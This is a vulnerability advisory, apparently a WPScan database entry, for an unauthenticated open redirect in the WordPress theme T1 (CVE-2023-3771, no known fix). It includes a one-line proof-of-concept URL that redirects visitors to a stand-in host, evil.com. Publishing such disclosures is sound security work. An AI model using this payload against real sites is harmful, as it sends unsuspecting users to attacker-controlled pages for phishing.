Themes Vulnerabilities

T1 theme <= 19.0 - Open Redirect

Description

The theme is vulnerable to unauthenticated open redirect with which any attacker and redirect users to arbitrary websites.

Proof of Concept

https://www.example.com/wp-content/themes/t1/page-templates/apply_redirection.php?file=240317005410&url_now=http://google.com&url_js=https://www.evil.com?

Affects Themes

t1
No known fix

References

CVE
CVE-2023-3771

Classification

Type
REDIRECT
OWASP top 10
A1: Injection
CWE
CWE-601
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
Vishal Barot vFlexo
Submitter
Vishal Barot vFlexo
Verified
Yes
WPVDB ID
7c6fc499-de09-4874-ab96-bdc24d550cfb

Timeline

Publicly Published
2023-07-19 (about 9 months ago)
Added
2023-07-19 (about 9 months ago)
Last Updated
2023-07-19 (about 9 months ago)

Other

Published
Title
Published
2024-04-25
Title
Video Conferencing with Zoom < 4.4.5 - Open Redirect
Published
2024-04-11
Title
FV Flowplayer Video Player < 7.5.45.7212 - Authenticated (Contributor+) Arbitrary Redirect
Published
2021-08-25
Title
Nested Pages < 3.1.16 - Open Redirect
Published
2015-06-05
Title
Freshdesk Support < 1.8 - Open Redirect
Published
2019-10-08
Title
All In One WP Security & Firewall <= 4.4.1 - Open Redirect & Hidden Login Page Exposure